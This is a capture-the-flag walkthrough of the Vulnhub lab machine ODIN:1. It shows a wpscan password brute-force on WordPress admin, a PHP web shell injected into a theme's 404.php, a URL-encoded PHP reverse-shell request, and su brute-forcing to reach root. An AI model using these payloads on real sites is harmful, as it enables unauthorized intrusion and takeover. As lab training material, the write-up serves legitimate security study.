Difficulty: Easy
Odin ventured to the Well of Mimir, near Jötunheim, the land of the giants in the guise of a walker named Vegtam. Mímir, who guarded the well, to allow him to drink from it, asked him to sacrifice his left eye, this being a symbol of his will to obtain knowledge

This is ODIN: 1 from Vulnhub.


HTTP only.


It says:

Just another Joomla site

But that’s a little joke because it’s actually wordpress.

root@kali:/opt/vulnhub/odin# wpscan -e --url http://odin

wp-scan only finds a user called ‘odin’, but trying to login at wp-admin with any random password gives an error:

Unknown username. Check again or try your email address.

So that’s curious. What if we try admin?

Error: The password you entered for the username admin is incorrect

Right. So admin exists; odin does not. What’s up with that, wp-scan? Lol.

We also have some encoded strings on the blog:


This is base32: rockyou nice wordlist

We have this:


Which is base64:

If you look closely, you won’t need it here

And this:


Which appears to be brainf^%k, which translates to:


Which never appears to be useful.

So a password attack on admin? Yes.

root@kali:/opt/vulnhub/odin# wpscan -U admin -P /usr/share/wordlists/rockyou.txt --url http://odin
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / qwerty                                                                                                        
Trying admin / ashley Time: 00:00:03 <                                                     > (20 / 14344412)  0.00%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: admin, Password: qwerty


One of the blog posts is called:

Twenty Twenty: 404 Template (404.php)

Wonder if that is a hint?

We can edit the file here:


And add:

<?php system($_GET['cmd']);?>

into the upper part of the file beneath the opening html tag. We can then access the file at:


And issue commands. Like a shell. Like this:

GET /wp-content/themes/twentytwenty/404.php?cmd=php+-r+'$sock%3dfsockopen("",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b' HTTP/1.1

On the box

We can login to mysql with joomla:joomla and grab some hashes but they don’t want to break easily, but there is a shortcut here. Linpeas has a mode (-a) that will brute force su. And we have weak passwords:

[+] Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds
  Bruteforcing user root...                                                                                                                               
  You can login as root using password: jasmine
  Bruteforcing user osboxes...
  Bruteforcing user voldemort...
  Bruteforcing user rockyou...
  You can login as rockyou using password: rockyou

So really that’s it; let’s check it:

rockyou@osboxes:~$ su root
su root
Password: jasmine

root@osboxes:/home/osboxes# cd /root
cd /root
root@osboxes:~# ls -lash
ls -lash
total 48K
4.0K drwx------  7 root root 4.0K Dec 16 03:24 .
4.0K drwxr-xr-x 23 root root 4.0K Jul  5 22:43 ..
4.0K drwx------  2 root root 4.0K Jun 24 17:24 .aptitude
4.0K -rw-------  1 root root    1 Dec  4 15:57 .bash_history
4.0K -rw-r--r--  1 root root 3.1K Dec  5  2019 .bashrc
4.0K -rw-r--r--  1 root root  109 Dec  5 08:34 bjorn
4.0K drwx------  6 root root 4.0K Dec  4 15:36 .cache
4.0K drwx------  3 root root 4.0K Dec  4 15:36 .config
4.0K drwx------  3 root root 4.0K Dec  4 15:36 .dbus
4.0K drwx------  3 root root 4.0K Dec  4 15:36 .local
4.0K -rw-r--r--  1 root root  161 Dec  5  2019 .profile
4.0K -rw-r-----  1 root root    4 Dec 16 03:24
root@osboxes:~# file bjorn
file bjorn
bjorn: UTF-8 Unicode text
root@osboxes:~# cat bjorn
cat bjorn

Have a nice day!

root@osboxes:~# echo 'aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1WaGtmblBWUXlhWQo=' | base64 -d
<ViZS5jb20vd2F0Y2g/dj1WaGtmblBWUXlhWQo=' | base64 -d
root@osboxes:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)